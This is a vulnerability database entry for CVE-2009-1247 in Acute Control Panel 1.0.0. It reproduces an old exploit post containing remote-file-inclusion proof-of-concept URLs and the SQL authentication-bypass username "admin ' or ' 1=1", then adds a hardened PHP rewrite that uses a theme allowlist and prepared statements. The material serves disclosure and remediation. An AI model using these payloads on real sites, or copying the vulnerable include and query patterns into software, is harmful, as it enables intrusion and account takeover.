Acute Control Panel 'login.php' SQL Injection Vulnerability

Vulnerability ID: 1117512        Type: SQL injection
Published: 2009-03-26            Updated: 2009-04-07
CVE: CVE-2009-1247               CNNVD ID: CNNVD-200904-113
Platform: PHP                    CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/8291
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-113
|Details
login.php in Acute Control Panel 1.0.0 contains a SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the username parameter.
|Exploit
###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################

[+] Remote File Inclusion

 Vulnerable code in container.php

-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 Vulnerable code in header.php

--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] SQL Injection (Auth Bypass)

 Vulnerable code in login.php

--------------------------------------------
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
--------------------------------------------

 PoC :

  Username : admin ' or ' 1=1
  Password : anything or nothing

################################################################

# milw0rm.com [2009-03-26]
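The two fixes a maintainer would apply to the code quoted in the advisory above, written here as an added example that is neither Acute Control Panel's code nor the advisory author's. The include in container.php and header.php takes its path from $theme_directory, which the PoC populates through a request parameter (register_globals); the hardened version resolves a theme name against an allowlist and a fixed base directory, so no request value is ever used as a path. The login query concatenates $username and $password into SQL; the hardened version binds the username as a parameter and checks the password against a stored hash, so the advisory's "admin ' or ' 1=1" is just a username that does not exist. THEME_BASE, ALLOWED_THEMES, the password_hash column, and the in-memory SQLite table used for the demonstration are all assumptions made for this example.

```php
<?php
declare(strict_types=1);

// Added hardened rewrite of the two vulnerable spots in the advisory.
// Assumed layout: themes live under THEME_BASE and only the names in
// ALLOWED_THEMES exist; the users table stores password_hash() output
// in a password_hash column instead of a plaintext password.
const THEME_BASE = __DIR__ . '/themes';                // assumed location
const ALLOWED_THEMES = ['default', 'dark', 'classic']; // assumed names

/**
 * Map a requested theme name to a directory under THEME_BASE.
 * Anything not on the allowlist (remote URLs, null-byte tricks,
 * "../" traversal) yields null, so include_once() never sees it.
 */
function theme_directory(?string $requested): ?string
{
    if ($requested === null || !in_array($requested, ALLOWED_THEMES, true)) {
        return null;
    }
    $dir = realpath(THEME_BASE . '/' . $requested);
    // realpath() returns false if the directory is missing; the prefix
    // check guards against symlinks pointing outside the theme tree.
    if ($dir === false
        || strpos($dir, realpath(THEME_BASE) . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir;
}

/**
 * Replacement for the concatenated login query. The username is a bound
 * parameter and the password never reaches SQL at all. Returns the user
 * row without the hash on success, null on any failure.
 */
function authenticate(PDO $pdo, string $username, string $password): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username, password_hash, email, fullname, permissions
           FROM `users` WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

// Demonstration against a constructed in-memory SQLite table.
$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$pdo->exec('CREATE TABLE `users` (id INTEGER PRIMARY KEY, username TEXT,
            password_hash TEXT, email TEXT, fullname TEXT, permissions TEXT)');
$ins = $pdo->prepare('INSERT INTO `users` (username, password_hash, email,
                      fullname, permissions) VALUES (?, ?, ?, ?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT),
               'admin@example.test', 'Site Admin', 'all']);

// The advisory's bypass string is now an unknown username: bool(true)
var_dump(authenticate($pdo, "admin ' or ' 1=1", 'anything') === null);
// Wrong password for a real user: bool(true)
var_dump(authenticate($pdo, 'admin', 'wrong') === null);
// Correct credentials: string(5) "admin"
var_dump(authenticate($pdo, 'admin', 'correct horse')['username']);

// Traversal and null-byte names are not on the allowlist: bool(true) twice
var_dump(theme_directory('../../../etc') === null);
var_dump(theme_directory("default\0") === null);
// Allowed name: a path under THEME_BASE if themes/default exists, else NULL
var_dump(theme_directory('default'));
```

In the application, the template include becomes `include_once theme_directory($_GET['theme'] ?? null) . '/sidebar.php'` behind a null check, and login.php calls `authenticate($pdo, $_POST['username'] ?? '', $_POST['password'] ?? '')` with PDO::ATTR_EMULATE_PREPARES set to false on the MySQL connection so the database, not the driver, does the parameter binding. Pairing the allowlist with allow_url_include=Off in php.ini closes the remote-include path even if another include is later missed.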
|References

Source: XF
Name: acutecontrol-login-sql-injection(49444)
Link: http://xforce.iss.net/xforce/xfdb/49444
Source: BID
Name: 34265
Link: http://www.securityfocus.com/bid/34265
Source: MILW0RM
Name: 8291
Link: http://www.milw0rm.com/exploits/8291
Source: SECUNIA
Name: 34485
Link: http://secunia.com/advisories/34485